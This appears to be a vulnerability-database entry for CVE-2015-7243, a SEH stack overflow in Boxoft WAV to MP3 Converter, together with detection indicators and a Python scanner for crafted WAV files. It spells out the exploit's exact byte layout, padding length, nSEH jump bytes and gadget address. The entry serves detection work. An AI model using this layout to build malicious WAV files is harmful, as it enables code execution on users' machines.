CVE-2015-7243
published 2015-09-18


Priority: P351 · high · 7.5 (CVSS 2.0)
AV:N / AC:L / Au:N / C:P / I:P / A:P
EXPLOIT
EPSS: 58.27% (99.0th percentile)
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.

Detection & IOCs (extracted from sources)

filename: crash3r.wav
filename: music.wav
registry: 0x0040144c
process: wavtomp3.exe
bytes: \xeb\x06\x90\x90
  • Trigger condition: a crafted WAV file exceeding 4000 bytes (specifically, 4132 bytes of padding before the SEH overwrite) causes a stack buffer overflow when it is converted to MP3 in Boxoft WAV to MP3 Converter.
  • SEH-based exploit: look for the short-jump NOP sled pattern \xeb\x06\x90\x90 immediately followed by the P/P/R ROP gadget address 0x0040144c packed little-endian (\x4c\x14\x40\x00) within a WAV file opened by wavtomp3.exe.
  • The Metasploit module drops a malicious WAV file (default name music.wav) with a null-byte bad-character constraint (\x00); monitor file-creation events for anomalously large WAV files written by non-audio applications.
  • The exploit targets wavtomp3.exe version 1.1.0.0 specifically; the P/P/R gadget at 0x0040144c is valid only for that binary version, so fingerprinting the version of the process can confirm an exploitation attempt.
  • Buffer layout: 4132 bytes of padding + 4-byte nSEH (\xeb\x06 + 2 bytes) + 4-byte SEH (ROP gadget) + shellcode + ~5860 bytes of padding. Detect WAV files with this total size profile (~10000 bytes) submitted to the converter.
  • The P/P/R ROP gadget address 0x0040144c is hardcoded and specific to wavtomp3.exe version 1.1.0.0 only; the exploit will not work against version 1.0 without a different gadget address.
  • The Metasploit module targets the Windows platform only and is a file-format (client-side) exploit that requires user interaction to open or convert the malicious WAV file.
  • The null byte (\x00) is a bad character for the payload; any shellcode used must avoid null bytes or the exploit will fail.
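The byte-pattern check described in the notes above, written as a file scanner. This is an added example, not code from the page or from the Metasploit module; the function name `scan_wav`, the verdict labels, and the RIFF/WAVE header check (an extra heuristic based on the standard WAV container layout) are assumptions.

```python
import struct

NSEH = b"\xeb\x06\x90\x90"             # nSEH bytes listed on the page
SEH = struct.pack("<I", 0x0040144C)    # P/P/R address from the page, little-endian
MARKER = NSEH + SEH                    # the two fields sit back to back
PAD_LEN = 4132                         # padding length before nSEH, per the page
MIN_TRIGGER_SIZE = 4000                # page: trigger file exceeds 4000 bytes


def scan_wav(data: bytes) -> dict:
    """Classify one file's bytes as 'clean', 'suspicious' or 'match'."""
    offsets = []
    pos = data.find(MARKER)
    while pos != -1:                   # collect every occurrence of the marker
        offsets.append(pos)
        pos = data.find(MARKER, pos + 1)

    # Assumption: a genuine WAV starts with a RIFF chunk whose form type is WAVE.
    header_ok = data[:4] == b"RIFF" and data[8:12] == b"WAVE"

    if PAD_LEN in offsets:
        verdict = "match"              # marker exactly where the layout puts it
    elif offsets:
        verdict = "suspicious"         # marker present, different offset
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "marker_offsets": offsets,
        "header_ok": header_ok,
        "over_trigger_size": len(data) > MIN_TRIGGER_SIZE,
    }


if __name__ == "__main__":
    # Constructed inputs: marker bytes only, no payload.
    flagged = b"A" * PAD_LEN + MARKER + b"B" * 64
    benign = b"RIFF" + struct.pack("<I", 5004) + b"WAVE" + b"\x00" * 5000
    for name, blob in (("flagged", flagged), ("benign", benign)):
        print(name, scan_wav(blob))
```

A "match" only covers files built with the exact address and offset on this page; a file with the marker at another offset, or a large `.wav` with no RIFF/WAVE header, still deserves a closer look.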

CVSS provenance

nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 5.0 MEDIUM